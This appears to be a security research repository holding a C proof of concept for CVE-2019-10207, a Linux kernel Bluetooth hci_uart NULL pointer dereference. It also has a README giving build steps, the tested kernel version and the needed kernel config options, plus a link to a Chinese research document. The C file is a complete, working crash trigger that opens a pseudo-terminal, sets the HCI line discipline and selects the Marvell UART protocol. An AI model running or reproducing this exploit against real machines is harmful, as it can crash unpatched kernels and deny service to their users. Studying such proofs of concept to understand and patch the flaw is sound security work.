├── CVE-2019-10207.c
├── README.md
└── linux kernel bluetooth模块研究和一个最新漏洞案例.docx


/CVE-2019-10207.c:
--------------------------------------------------------------------------------
 1 | #define GNU_SOURCE
 2 | 
 3 | #include <stdio.h>
 4 | #include <fcntl.h>
 5 | #include <stdlib.h>
 6 | #include <string.h>
 7 | #include <sys/ioctl.h>
 8 | #include <sys/syscall.h>
 9 | #include <unistd.h>
10 | #include <sys/stat.h>
11 | 
12 | #define N_HCI 15
13 | #define HCI_UART_MRVL 11
14 | #define HCI_UART_INTEL 6
15 | #define HCI_UART_ATH3K	5
16 | 
17 | #define HCIUARTSETPROTO		_IOW('U', 200, int)
18 | 
19 | static int syz_open_pts(int a0)
20 | {
21 |   int ptyno = 0;
22 |   char buf[20]={0};
23 |   int ret;
24 | 
25 |   if (ioctl(a0, TIOCGPTN, &ptyno)){
26 | 	perror("ioctl TIOCGPTN");
27 | 	return -1;
28 |   }
29 | 
30 |   sprintf(buf, "/dev/pts/%d", ptyno);
31 | 
32 |   if(chmod(buf,S_IRUSR|S_IWUSR|S_IWGRP)<0){
33 | 		perror("chmod");
34 | 		return -1;
35 |   }
36 | 
37 |   if(ioctl(a0,TIOCSPTLCK,&ret)<0){
38 | 		perror("ioctl TIOCSPTLCK");
39 | 		return -1;
40 |   }
41 |   
42 |   return open(buf, O_RDWR);
43 | }
44 | 
45 | int main(int argc, char** argv)
46 | {
47 | 	int ldisc = N_HCI;
48 | 	int proto = HCI_UART_MRVL;
49 | 	int fd,fd1,ret;
50 | 	fd = open("/dev/ptmx",O_RDWR | O_NOCTTY);
51 | 	if (fd == -1){
52 | 		perror("open");
53 | 		return 0;
54 | 	}
55 | 	fd1 =  syz_open_pts(fd);
56 | 	if(fd1 == -1){
57 | 		perror("syz_open_pts");
58 | 		goto _close;
59 | 	}
60 | 	
61 | 	/* configure line settings */
62 | 	ret = ioctl ( fd1 , TIOCSETD , &ldisc ) ;
63 | 	if(ret == -1){
64 | 		perror("ioctl TIOCSETD");
65 | 		goto _close;
66 | 	}
67 | 	ret = ioctl ( fd1 , HCIUARTSETPROTO , HCI_UART_MRVL ) ;
68 | 	if(ret == -1){
69 | 		perror("ioctl HCIUARTSETPROTO");
70 | 		goto _close;
71 | 	}
72 | 	
73 | _close:
74 | 	close(fd);
75 | 	return 0;
76 | }
77 | 
78 | 
79 | 
80 | 


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
 1 | # CVE-2019-10207
 2 | PoC for CVE-2019-10207 linux kernel: bluetooth: hci_uart: kernel NULL pointer dereference
 3 | 
 4 | ```
 5 | gcc CVE-2019-10207.c -o cve-2019-10207-poc -static
 6 | ```
 7 | 
 8 | test on 4.20.0
 9 | 
10 | kernel compile CONFIG_* must be opened:
11 | ```
12 | CONFIG_BT_HCIUART_MRVL=y
13 | CONFIG_BT_MRVL=y
14 | ```
15 | 
16 | 
17 | 
18 | 
19 | 
20 | 


--------------------------------------------------------------------------------
/linux kernel bluetooth模块研究和一个最新漏洞案例.docx:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/butterflyhack/CVE-2019-10207/62a694a99a57ffd10797ea67808d5122e2d51e02/linux kernel bluetooth模块研究和一个最新漏洞案例.docx


--------------------------------------------------------------------------------